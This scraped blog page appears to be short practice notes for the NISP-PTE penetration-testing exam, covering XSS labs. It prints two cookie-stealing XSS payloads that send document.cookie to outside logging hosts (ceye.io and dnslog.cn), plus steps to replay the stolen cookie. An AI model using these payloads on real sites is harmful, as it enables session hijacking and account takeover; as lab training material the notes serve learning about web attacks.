当前位置: 首页 > news >正文

NISP-PTE基础实操——XSS

news 2025/7/21 8:08:44

pteXSS模拟1 

<script>
var img
=document.createElement("img");img.src="http://xxxxx.ceye.io/log?"+escape(document.coo
kie);document.body.appendChild(img);
</script>

重放加Cookie头 

pteXSS模拟2

<script type="text/javascript">
var arr=document.cookie.split(/[;=]/);var url="http://"+arr[1]+".e0nv60.dnslog.cn/xxx.png";document.write('<img src="'+url+'"/>');
</script>

提交表单并刷新看dns返回记录

DNSLog Platform

 pteXSS模拟3

尝试发现是除了大写外过滤

http://www.xdnf.cn/news/1155835.html

相关文章:

  • MybatisPlus-14.扩展功能-DB静态工具-练习
  • windows + phpstorm 2024 + phpstudy 8 + php7.3 + thinkphp6 配置xdebug调试
  • MySQL学习----Explain
  • Kubernetes (K8S)知识详解
  • 二阶 IIR(biquad)滤波器
  • 红宝书单词学习笔记 list 51-75
  • Product Hunt 每日热榜 | 2025-07-20
  • 【c++】200*200 01灰度矩阵求所有的连通区域坐标集合
  • 去中心化协作智能生态系统
  • RK3588 安卓adb操作
  • Order Capital Round 1 (Codeforces Round 1038, Div. 1 + Div. 2) C、D
  • 讲解Mysql OnlineDDL的算法
  • 如何解决pip安装报错ModuleNotFoundError: No module named ‘lxml’问题
  • docker Neo4j
  • 【RK3576】【Android14】显示屏MIPI开发调试
  • 【图文详解】Transformer架构详细解析:多头自注意力机制、qkv计算过程、encoder架构、decoder架构以及mask的意义
  • Qwen3-8B 与 ChatGPT-4o Mini 的 TTFT 性能对比与底层原理详解
  • 网鼎杯2020青龙组notes复现
  • springboot websocket 自动重启方案
  • 彩虹云商城全源码 - 全新客服系统上线
  • CAN通讯理论与实践:调试和优化全讲解
  • 移动端开发的package命名规范
  • 《突破 GIL 限制:Python 多线程的真相与最佳实践》
  • “人工智能+”视域下计算思维与语文写作融合的跨学科教学设计模式探究
  • OpenTelemetry学习笔记(九):Elastic 对 OTLP 的原生支持
  • 二、Spark 开发环境搭建 IDEA + Maven 及 WordCount 案例实战
  • Golang的微服务链路追踪
  • 7. 命令模式
  • 5G NR PDCCH之CRC处理
  • GaussDB 数据库架构师修炼(七) 安全规划